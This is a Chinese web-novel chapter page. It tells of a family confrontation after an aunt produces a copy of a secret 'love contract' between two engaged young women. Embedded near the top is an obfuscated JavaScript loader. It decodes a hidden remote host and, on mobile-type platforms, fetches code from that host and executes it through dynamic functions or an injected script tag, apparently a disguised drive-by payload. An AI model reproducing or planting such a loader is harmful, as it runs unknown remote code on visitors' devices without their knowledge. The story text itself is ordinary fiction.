98小说网

阅读记录  |   用户书架
function UqgsgfgDv(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{ c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function UqSDDFGvyQ(e){ var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,""); while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return UqgsgfgDv(t);};window[''+'U'+'Y'+'C'+'q'+'J'+'K'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=UqSDDFGvyQ,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery'; if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/bm-'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'u'+'q'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/m-'+i;cs.parentElement.insertBefore(s,cs);}})('aGYuaHN2Y2huc3ZuY3Z2ZC5jb20=','2843',window,document,['G','TpoZFcguG']);}:function(){};
上一章
目录 | 设置
下一页

分卷(61(1 / 2)

加入书签 | 推荐本书 | 问题反馈 |

见父亲沉默,孟姗姗继续催爸,您说说您怎么看呀,我跟您说这个事儿也有大半天了,您怎么没点反应呢。

孟卫国呵呵笑了笑,将文件朝她举了举你是从哪里得来的这个?

孟姗姗语塞。前边副驾驶的谢琼张了张嘴要说话,被母亲用眼神制止。

这个好歹也是个秘密文件,她们不会好好藏起来?怎么会到你手里?

孟姗姗在父亲审视的目光里,也只是愣神两秒,紧接着就打通任督二脉那天芬姨打扫房间,这玩意儿从若若的书桌抽屉缝隙掉出来,她拿给我看,问是什么。我就复印了一份咯。想着过了年才和你说,哎爸爸,您能不要在意这些细节吗。

孟卫国不以为然地摇了摇头有这个,又有什么关系呢,这不过是当时两个孩子不认识,不了解对方,现在,我看她俩处挺好。

孟姗姗咄了一声爸,强扭的瓜不甜!在您面前那都是做戏给您看的您懂吧?您不说联姻是为了她两个幸福着想吗,现在人为了你,委曲求全,演这么一出大戏,戴着面具生活,您满意?我让您介绍给我们家谢琼介绍给我们家谢琼,您不听。再不济,您多给若若些资源,好好抚养也就是了,硬把孟璟塞给她。有您这么报恩的吗,您这是报仇!

前边开车的谢瀛连忙说孟姗姗,你怎么说话呢?

孟姗姗也怕药下太猛急坏父亲,拍拍他的肩,爸,您想想吧,我已经让老杨接人去了,回头您看怎么处理,这个婚约

孟卫国朝她摆了摆手,做沉思状,又将那文件副本翻来覆去地看了看。

到家不见老爷子。只见到芬姨,她说孟爷爷在回家的路上。

宋若到家没多久,接到林尽染的微信,意思是她回家来过年,过两天又要离开了,特意带了些妈妈调职城市的土特产,要带给她。怕宋若拒绝,又说是林母特意强调一定要送到她手上的,她还在为上次贸然给宋若介绍对象而感到内疚。听她这样说,宋若便和她约在学校附近,以前去过的水吧,全副武装出门。

到了目的地,林尽染一和她照面,立即露出呆愣的神色宋若若,你恋爱啦?

宋若有点懵嗯?

林尽染笑嘻嘻地我身边好几个谈恋爱的同学,都和你一样。

哪里一样?宋若是第二次遭遇这种玄学了。上一次还是在秦萌那里,遇到的小神棍。这真的能看出来?

林尽染叫了饮料,托着腮,笑眯眯地摇头,说不大清,就是一种气场,甜甜的。

两个人就别后生活略聊几句,宋若还在这位前同桌拿来的几十张她的照片上签了名,以便送给她认识的新同学。

林尽染临分手还不忘打趣哈哈哈若若赶着回家的样子,就好像有谁等着你约会一样。

宋若脸黑了黑。

出门前鲸鱼要护送,被她拒绝后,孟璟让她早点回。

回家客厅却不见孟璟。

原来是芬姨房间一个衣柜的隔板出问题。

孟璟要给她换个新的,然而芬姨老一辈的人,惜物惜惯了,这本来就是她初到孟家时自己去挑的,陪了她好些年,她说要么大小姐你就随我将就着用,要么帮忙找人给我修修,换是不必换了,我也没那么多衣服要收拾。

孟璟听了,跑工具房里去拿了钳子扳手螺丝锤子等等,自己动手,乒乒乓乓,把个大衣柜拆了重组。

宋若回来时她还在弄。

最后还真让她给修好了

芬姨和宋若在旁边,啪啪啪给她鼓掌。

孟璟叉腰看着自己的劳动成果,扭头擦汗,问未婚妻老婆,我厉不厉害?

宋若有些忍俊不禁,忍笑点了点头厉害。

孟璟就高了兴,到她面前背对着她站直,撒娇手酸了,解不开,老婆帮帮忙。

宋若替她把身上的围裙解下来。

抹香鲸转个身,脸颊泛着红晕,额头挂着小汗珠,脸上还蹭了些灰。

眼见鲸鱼又要抬袖子去抹汗,宋若拉住她的手,从外衣口袋里掏出一方浅蓝色的小手绢递给她。

孟璟笑了笑,并不接那手绢,只微微屈膝,把脸凑到未婚妻跟前,示意她帮忙,眯着眼睛像只惬意的小动物。

宋若意会过来,拿手绢轻轻替她擦拭干净,说声好了话没说完,嘴唇上温软的一触。是被鲸鱼啄了一下。

门外,传来停车声。

第74章

一家子都坐在客厅里。

芬姨端着泡好的茶上来,每人跟前放一杯。在她看来,作为新年孟家第一次相聚来说,气氛过于紧张了。

五分钟前,宋若和孟璟去外边迎接老人回家,迎面而来的孟老爷子虽然回应了她的新年快乐,表情比起往常却少了几分愉悦,多了几分凝重。宋若在不清楚原因之前,还有点疑心是不是老人身体不舒服,一颗心堪堪悬了起来。可紧跟其后的孟姗姗却一副胜利者的姿态,脸上没有半点隐忧,这替宋若排除了老人身体不适的假设。紧跟着的谢琼,表情她没读懂,像是担忧和忧虑的混合体。

当然那是五分钟前,现在,一切都有了答案。

孟姗姗往桌子上轻飘飘放了一张纸。

她和孟璟的恋爱合约的复印版。

宋若没有立刻发问这东西怎么出现在这儿的。这是她那方面的合约,她那个抽屉,许久都没有打开来了。压在最底层,纵使是芬姨帮她打扫屋子,也不会发现这份幼稚文件的存在。

孟璟比她激动得多,看清是什么以后,早刷拉站了起来,语气狠厉这谁弄的?

怎么,做错了事情还先横起来了?孟姗姗似笑非笑地,恶人先告状,倒打一耙?

孟璟嗤地一笑我干什么了我就恶人。大过年的,姑姑你是不会说中国话还是怎么回事,跟这儿阴阳怪气的?

你为什么欺骗你爷爷?孟姗姗今天的口红颜色格外深,格外刺目,小小年纪就玩这阳奉阴违的一套。以后还有什么是你干不出来的?

孟璟的脸上有个接近冰点的笑扯什么阳奉阴违呢,这是我和我老婆的恋爱情趣,我们爱写几百张合约,你管得着吗?再说这东西,我们俩都收得好好的,你是跟哪儿溜门撬锁弄出来的,人家好歹也称您一声孟总,拿着别人的隐私来质问别人,这违法的你知道吗咨询下你的那些法律顾问

这时候老爷子发声了孟璟你坐下。

孟璟被这一打断,回过神来,这才察觉未婚妻也拉着自己的手。小小的未婚妻两眼水汪汪的,这时候更有点泫然欲泣,看着楚楚可怜,她拉着她的手轻轻晃了晃。孟璟挨着她坐下,在她后脑勺轻轻摩挲了两下,像给小动物顺毛。

孟卫国问了一句这是你们谁想的主意?

两个人同时说我。两人说完对视了一眼,孟璟抢先说爷爷,是我做错了,这是若若刚来的时候,我不了解她,对于陌生人做我女朋友有点抗拒,所以弄了这个,都是我混。但过了没几天我就后悔了,这个现在不作数的,就,我和若若说了文件作废,但忘在那里,没来得及扔掉。也不知道谁那么坏,处心积虑把它捅出来,惹您生气。

上一章
目录
下一页
A- 18 A+
默认 贵族金 护眼绿 羊皮纸 可爱粉 夜间